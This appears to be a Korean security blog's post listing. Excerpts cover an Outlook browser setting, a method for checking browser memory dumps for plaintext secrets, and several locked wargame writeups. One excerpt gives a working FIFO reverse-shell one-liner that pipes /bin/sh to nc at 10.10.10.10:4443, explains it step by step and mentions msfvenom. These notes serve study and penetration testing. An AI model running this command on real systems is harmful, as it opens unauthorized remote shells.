버그헌팅 TIP
·
보안/리뷰
보호되어 있는 글입니다.
reverse shell - fifo
·
System/침투
rm /tmp/fifo;mkfifo /tmp/fifo;cat /tmp/fifo | /bin/sh -i 2>&1 | nc 10.10.10.10 4443 >/tmp/fifo fifo : 서로 다른 프로세스 간 통신에 사용되는 파이프 * 본래 pipe는 부모-자식 간에만 이용 가능 - fifo 파일이 이미 존재하는 경우 에러가 발생하기에 삭제 - fifo 파일 생성 - cat tmp/fifo : fifo 파일 읽어와서 표준출력 - 읽은 데이터를 /bin/sh 로 전달하여 실행 * -i : 대화형 쉘 - nc 10.10.10.10 4443 > /tmp/fifo : nc연결시도ㅡ, 그 출력을 fifo로 대충 이런 의미인 듯 하다. 참고로 msfvemon 명령으로도 위 명령생성 가능함 msfvenom -p cmd/..
아웃룩 메일 하이퍼링크 기본앱 설정
·
일상X사랑X돈/뜨거운감자
이상하게 아웃룩으로 온 메일에 첨부된 하이퍼링크를 누르면 edge로 열린다. 나는 chrome을 사용하고 있는데 -,- 기본 앱 설정이 Chrome으로 되어있음에도 불구하고 Edge로 열러서 귀찮았다. 업무메일 확인해야하는데 Edge로 열리면 새로 로그인하라고 하니.. 보니까 아웃룩 설정에 별도로 설정이 있어 이러는 것 같다. [설정 위치] 파일 > 옵션 > 고급 > 파일 및 브라우저 기본 설정 > "기본 브라우저" 선택 [그림 설명] 끝.
blind sql injection advanced writeup
·
Play/wargame
보호되어 있는 글입니다.
SQL Injection Bypass WAF (+advanced) writeup
·
Play/wargame
보호되어 있는 글입니다.
[웹] 브라우저 메모리 내 정보 노출 확인
·
보안/웹·모바일
브라우저 메모리 보는 방법 1. PID 확인→ Shift + Esc 2. 작업관리자에서 해당 프로세스 우클릭, 덤프파일 만들기 3. 만들어진 덤프파일 HxD로 확인  메모리 내 중요정보가 평문으로 노출되어 있을 경우 취약임.그냥 덤프하지말고, 특정 작업 이후에 덤프할 것. EX) 회원가입 후, 회원정보 변경 후, 신분증 인증 후 등....
error based sqli writeup
·
Play/wargame
보호되어 있는 글입니다.
blind-command writeup
·
Play/wargame
보호되어 있는 글입니다.

티스토리툴바